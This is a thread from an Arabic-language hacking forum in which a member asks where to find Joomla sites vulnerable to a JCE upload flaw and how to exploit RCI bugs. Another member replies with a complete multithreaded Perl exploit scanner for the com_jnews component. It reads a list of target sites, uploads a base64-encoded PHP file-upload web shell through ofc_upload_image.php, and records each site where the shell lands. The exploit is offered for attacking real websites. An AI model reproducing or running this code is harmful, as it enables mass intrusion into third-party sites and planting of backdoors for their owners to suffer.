1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Erorr Salawi 404 | المشاهدات : 582 | الردود : 5
حالة الموضوع:
مغلق
  1. Erorr Salawi 404 DeveloPer Plus

    الأنتساب:
    ‏7 يوليو 2014
    المشاركات:
    103
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    اللغة البرمجية:
    Visual Basic
    Facebook:
    ممكن مواقع جوملة مصابة بتغرة jce لانني لم اجدها وايضا الدوركات لا تعمل بدون جدوا
     
  2. Pro.Mast3r V • I • P

    الأنتساب:
    ‏13 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    الوظيفة:
    student
    الإقامة:
    IraQ/Nasiriyah
    نظام التشغيل:
    windows 8.1
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي

    • اولا : الموضوع في القسم الخطأ .

    • ثانيا : ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP

    • حاول تجد ثغرات اخرى مثل RCI , SQL .
     
  3. TeePlow V • I • P

    الأنتساب:
    ‏12 مارس 2014
    المشاركات:
    400
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    السلام عليكم
    ينقل للقسم الصحيح
    ثانيا مثل ما قال الاخ :
    ثغره jce انقرضت وحتى لو وجدت في موقع ماتكدر ترفع ملف .PHP
     
  4. Erorr Salawi 404 DeveloPer Plus

    الأنتساب:
    ‏7 يوليو 2014
    المشاركات:
    103
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اوكي وكيف استغل تغرة rci
     
  5. Pro.Mast3r V • I • P

    الأنتساب:
    ‏13 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    الوظيفة:
    student
    الإقامة:
    IraQ/Nasiriyah
    نظام التشغيل:
    windows 8.1
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    اخي ثغرات عباره عن استغلال امري
    يعني تستطيع تنفيذ امر عن طريقها
    ومايفيدك هو امر الاستدعاء
    wget

    والثغره منتشره في اضافات الجوملا

    مثل

    • com_jnewsletter
    هذه اداه بيرل
    لااستغلال الثغره
    كود PHP:
    #!/usr/bin/perl
    # Module Needed :)
    use strict;
    no warnings;
    use 
    threads;
    use 
    threads::shared;
    use 
    LWP::UserAgent;
    use 
    HTTP::Request;
    use 
    LWP::Simple;
    use 
    HTTP::Request::Common;
    use 
    Term::ANSIColor;
    use 
    Win32::Console::ANSI;
    use 
    MIME::Base64;
    ##############################
    if($^=~ /Win/){
    system("cls");
    }else{
    system("clear");
    }
    my $ua LWP::UserAgent->new;
    $ua->timeout(15);
    $ua->agent('Mozilla/5.0');
    print 
    color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
    print 
    color("bold red"),"[+] coded by Mr_AnarShi-T\n";
    print 
    color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
    print 
    color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
    print 
    color 'reset';
    print 
    color("green"),"[+] Enter File : ";
    print 
    color 'reset';
    my $file=<STDIN>;
    chomp($file);
    print 
    color("green"),"\n[+] Enter Thread Number : ";
    print 
    color 'reset';
    my $thread=<STDIN>;
    chomp($thread);
    my $threads $thread;
    my @linkz shared;
    my @paths shared;
    GetLinks();
    while (
    threads->list) {}
    print 
    color ('green');
    print 
    "\n[+] Link Founded : ";
    print 
    color 'reset';
    print
    "".scalar(@linkz)."\n\n";
    CheckLinks();
    while (
    threads->list) {}
    sub GetLinks {
    openLNK"$file) or die "$!\n";
    while( 
    definedmy $line_ = <LNK> ) ) {
    chomp$line_ );
    push( @linkz$line_ );
    }
    closeLNK );
    }
    sub CheckLinks {
    foreach 
    my $link( @linkz ) {
    my $ctr 0;
    foreach 
    my $thr threads->list ) { $ctr++; }
    if (
    $ctr $threads){
    threads->create( \&CheckLinkz_exploits,$link );
    }
    else { 
    redo; }
    }
    }
    sub CheckLinkz_exploits {
    my $link shift ;
    chomp ($link);
    my $site_vul "http://".$link "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
    my $encoded "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgTXJfQW5hclNoaS1UIDwvdGl0bGU+JzsNCmVj​aG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRh​dGEiIG5hbWU9InVwbG9hZGVyDQoiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJm​aWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIN​CmlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAi​VXBsb2FkIiApIHsNCiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAk​X0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnDQo8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9i​Pjxicj48YnI+JzsgfQ0KICAgICAgICBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWxlZCAhISE8L2I+​PGJyPjxicj4nOyB9DQp9DQo/Pg==";
    my $evil decode_base64($encoded);
    my $res $ua->request(POST $site_vul,Content_Type => 'text/plain'Content => $evil);
    print 
    "[+] Checking $link\n\n";
    if (
    $res->is_success){
    print 
    "[+] $link is vul\n";
    print 
    "[+] Checking If The Evil code Was Uploded\n";
    my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
    my $url "http://".$link$vul;
    my $request HTTP::Request->new(GET=>$url);
    my $useragent LWP::UserAgent->new();
    my $response $useragent->request($request);
    if (
    $response->content=~m/<title>Upload Files Mr_AnarShi-<\/title>/g){
    print 
    color("yellow"),"[.] Found => $url\n\n";
    print 
    color 'reset';
    open(BEN,">>result-$link.txt");
    print 
    BEN "$url\n";
    close(BEN);
    }
    else
    {
    print 
    "[.] Not Found \n";
    }
    }
    threads->detach();
    موفق .~
     
  6. sєиɪσя нσssαм ★ Abu Nabil ★ V • I • P

    الأنتساب:
    ‏11 يوليو 2014
    المشاركات:
    202
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    50
    الإقامة:
    فــ ـي قـ ـ لـ ـ و بــ كـم
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    رد: ممكن مواقع جوملة مصابة بتغرة jce

    يتم آختيآر آفضل رد لعدم آهتمآم العضو بآلطلب المطروح
    بعد آذن الجميع يغلق الموضوع للآنتهآء
    )5:"
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة